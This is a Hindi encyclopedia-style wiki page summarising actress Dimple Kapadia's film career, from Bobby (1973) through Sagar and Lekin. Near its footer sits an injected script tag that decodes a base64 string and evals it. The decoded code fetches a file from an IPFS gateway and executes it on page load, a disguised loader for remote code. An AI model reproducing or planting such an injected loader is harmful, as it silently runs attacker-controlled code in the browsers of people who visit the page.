डिम्पल कपाड़िया का फ़िल्मी कॅरियर

भारत डिस्कवरी प्रस्तुति
Revision as of 13:04, 16 July 2017 by कविता भाटिया (talk | contribs) ('{{साँचा:सूचना बक्सा डिम्पल कपाड़िया}} डिंपल कपाड़िय...' के साथ नया पृष्ठ बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Template:साँचा:सूचना बक्सा डिम्पल कपाड़िया डिंपल कपाड़िया एक भारतीय अभिनेत्री हैं। अभिनेत्री डिम्पल कपाड़िया उन कलाकारों में शामिल हैं, जिन्होंने हिंदी सीनेमा में नायिका की परंपरागत छवि को बदलने में महत्वपूर्ण भूमिका निभाई है।

फ़िल्मी सफर

डिंपल ने अपने करियर की शुरुआत की साल 1973 में निर्देशक राजकपूर की फ़िल्म 'बॉबी' से की थी। इस फ़िल्म में उनके अपोजिट ऋषि कपूर थे। इस फ़िल्म से कपाड़िया रातों-रात सुपरस्टार बन गयीं थीं। इस फ़िल्म के बाद उनके पास फ़िल्मों की कतार लग गयी थीं लेकिन उन्होंने सभी फ़िल्मों के प्रस्ताव को ठुकराकर आइडल बीवी बनना उचित समझा, क्योँकि इस फ़िल्म की शूटिंग के दौरान ही डिंपल ने सुपरस्टार राजेश खन्ना से शादी रचा ली थी। हालंकि उनकी यह शादी दस साल तक ही चली और इसके बाद राजेश-डिंपल अलग हो गए।

राजेश खन्ना से अलग होने के बाद डिंपल ने एक बार फिर पर्दे पर वापसी की। उन्होंने सागर (1985) फ़िल्म में एक बार फिर ऋषि कपूर के साथ काम किया। रमेश सिप्पी निर्देशित फ़िल्म सागर में डिंपल कपाड़िया ने अपनी सेक्सी-बोल्ड इमेज से दर्शकों को चौंका दिया। 'बॉबी' के बाद इस फ़िल्म के लिए भी डिंपल को फ़िल्म फेयर अवॉर्ड मिला।

फ़िल्म सागर के बाद हिंदी सिनेमा में डिंपल की छवि एक बोल्ड अभिनेत्री के रूप में उजगार होने लगी। इसके बाद उन्होंने कई बेहतरीन फ़िल्मों में काम किया। साल 1991 में आई फ़िल्म 'लेकिन' उनके करियर का टर्निंग पॉइंट रही। इस फ़िल्म का निर्माण स्वर कोकिला लता मंगेशकर ने किया था। इस फ़िल्म का गाना 'यारा सिली सिली' दर्शकों के बीच बेहद लोकप्रिय हुआ था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ


बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः